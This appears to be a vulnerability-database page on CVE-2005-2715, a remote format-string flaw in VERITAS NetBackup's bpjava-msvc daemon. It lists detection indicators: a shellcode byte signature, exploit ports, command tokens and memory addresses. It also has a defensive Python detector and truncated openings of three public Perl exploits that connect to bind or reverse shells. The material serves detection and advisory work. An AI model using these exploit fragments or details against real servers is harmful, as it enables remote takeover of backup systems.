CVE-2005-2715
Published 2005-10-12
Priority: P267 | critical | 10 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 60.36% (99.0th percentile)
Format string vulnerability in the Java user interface service (bpjava-msvc) daemon for VERITAS NetBackup Data and Business Center 4.5FP and 4.5MP, and NetBackup Enterprise/Server/Client 5.0, 5.1, and 6.0, allows remote attackers to execute arbitrary code via the COMMAND_LOGON_TO_MSERVER command.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| symantec_veritas | netbackup_data_and_business_center | — | — |
| symantec_veritas | netbackup_data_and_business_center | — | — |
| symantec_veritas | netbackup_enterprise_server_client | — | — |
| symantec_veritas | netbackup_enterprise_server_client | — | — |
| symantec_veritas | netbackup_enterprise_server_client | — | — |
Detection & IOCs (extracted from sources)
bytes:
\x90\x90\x90\x90\xeb\x42\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea
- The exploit targets TCP port 13722 (bpjava-msvc daemon). Monitor for unexpected or malformed connections to this port, especially those sending protocol command tokens ' 101 6' or ' 118 1' followed by format string payloads containing '%hn', '%x', or '%n' specifiers.
- After successful Linux exploitation, the attacker connects back to port 5570 for a reverse/bind shell. Monitor for unexpected outbound or inbound TCP connections on port 5570 from the NetBackup server process.
- After successful OSX/PPC exploitation, the attacker connects to port 5557 for a bind shell. Monitor for unexpected TCP connections on port 5557 originating from or to the NetBackup server.
- The Windows exploit overwrites the PEB FastPebLockRoutine pointer (at 0x7FFDF020) or a static SEH frame (at 0x0012ffb0) with a code stub at 0x7FFDF250. Detection on Windows can look for writes to these fixed PEB addresses or abnormal SEH chain modifications in the bpjava-msvc process.
- The Linux exploit hardcodes a return location (retloc) and return address (retaddr) specific to a particular build of NetBackup 6.0 on Linux/x86. These addresses may differ across patch levels or OS distributions, limiting direct reuse of the exploit without adjustment.
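
The network indicators above can be checked mechanically. The following is an added example, not code from this page or from the exploit authors: it assumes flows have already been reassembled and scoped to the NetBackup host, and it generalises the three listed specifiers to their flag, width, precision and `N$` variants. The sample flows and the field layout after each command token are constructed.

```python
import re
from typing import Optional

BPJAVA_PORT = 13722                      # bpjava-msvc listener (from the page)
SHELL_PORTS = {5570: "Linux exploit shell", 5557: "OSX/PPC bind shell"}

# Command tokens the page ties to the exploit traffic.
TOKEN_RE = re.compile(rb" (101 6|118 1)(?![0-9])")
# %x / %n / %hn, generalised (assumption) to flags, width, precision and N$.
SPEC_RE = re.compile(rb"%(?:\d+\$)?[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l)?([xXn])")

def inspect_payload(payload: bytes) -> Optional[dict]:
    """Flag format specifiers that follow a command token in one payload."""
    token = TOKEN_RE.search(payload)
    if token is None:
        return None
    specs = list(SPEC_RE.finditer(payload, token.end()))
    if not specs:
        return None
    writes = any(m.group(1) == b"n" for m in specs)   # %n family writes memory
    return {
        "token": token.group(1).decode(),
        "specifiers": [m.group(0).decode() for m in specs],
        "severity": "high" if writes else "medium",
    }

def inspect_flow(dst_port: int, payload: bytes = b"") -> Optional[dict]:
    """Apply the page's network indicators to one flow record."""
    if dst_port == BPJAVA_PORT:
        return inspect_payload(payload)
    if dst_port in SHELL_PORTS:
        return {"port": dst_port, "note": SHELL_PORTS[dst_port], "severity": "high"}
    return None

# Constructed flows (dst_port, payload); field layout after the token is invented.
SAMPLE_FLOWS = [
    (13722, b" 101 6\nbackupadmin\n"),
    (13722, b" 118 1\n%x%x%.8x%12$hn\n"),
    (13722, b" 101 6\n%x.%x.%x\n"),
    (5570, b""),
    (443, b" 101 6 %n"),
]

if __name__ == "__main__":
    for port, data in SAMPLE_FLOWS:
        print(port, data[:24], "->", inspect_flow(port, data))
```

A logon field containing only `%x` is reported at medium severity because it reads memory without writing it; any `%n` variant is reported as high.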
No detection rules found.
Exploit-DB
Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote Command Execution
exploitdb·2005-10-20
---
#!C:\Perl\bin\perl.exe -w
#
# Vertias Netbackup Win32 format string exploit
# Code By: johnh[at]digitalmunition[dot]com & kf[at]digitalmunition[dot]com
#
# For win2k/xp pre sp2 we overwrote PEBFastlock -> rtlentercritical
# For win xp sp2 we overwrote SEH
# http://www.digitalmunition.com/
#
# You may have to run this 2 times.
use IO::Socket;
use Getopt::Std; getopts('h:p:t:', \ our %args);
if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'p'})) { $port = $args{'p'}; }else{$port = 13722;}
if (defined($args{'t'})) { $target = $args{'t'}; }
print "\n-=[Remote Veritas NetBackup Format String exploit]=-\n\n";
print "\n-=[TagTeam johnh[at]digitalmunition[dot]com and kf_lists[at]digitalmunitio
Exploit-DB
Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote Command Execution
exploitdb·2005-10-20
---
#!/usr/bin/perl
##############################################################
# VERITAS-Linux.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit
# johnh[at]digitalmunition[dot]com
# bug found by kf_lists[at]digitalmunition[dot]com
# http://www.digitalmunition.com/
##############################################################
use POSIX;
use IO::Socket;
use IO::Select;
use strict;
print STDERR "\nveritas.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit\n";
if ($#ARGV == -1) {
print "Usage:\n\t$0 \n\n";
exit (1);
}
my $hostName = $ARGV[0];
my $port = $ARGV[1] || 13722;
buildexploit ($hostName, $port);
my $shellport = 5570;
print "[*] Connect to remote shell port\n";
my $sock = IO::So
Exploit-DB
Veritas NetBackup 6.0 (OSX) - 'bpjava-msvc' Remote Command Execution
exploitdb·2005-10-20
---
#!/usr/bin/perl
# VERITAS-OSX.pl - VERITAS NetBackup Format Strings OSX/ppc Remote Exploit
# johnh[at]digitalmunition[dot]com
# bug found by kf_lists[at]digitalmunition[dot]com
# http://www.digitalmunition.com/
use POSIX;
use IO::Socket;
use IO::Select;
my $shellcode = # /* OSX BINDSHELLCODE PORT=5557 NO-0x0 */
No writeups or analysis indexed.
- http://secunia.com/advisories/17181
- http://securitytracker.com/id?1015028
- http://seer.support.veritas.com/docs/279085.htm
- http://sunsolve.sun.com/search/document.do?assetkey=1-26-102054-1
- http://www.kb.cert.org/vuls/id/495556
- http://www.securityfocus.com/bid/15079
- http://www.symantec.com/avcenter/security/Content/2005.10.12.html
- http://www.zerodayinitiative.com/advisories/ZDI-05-001.html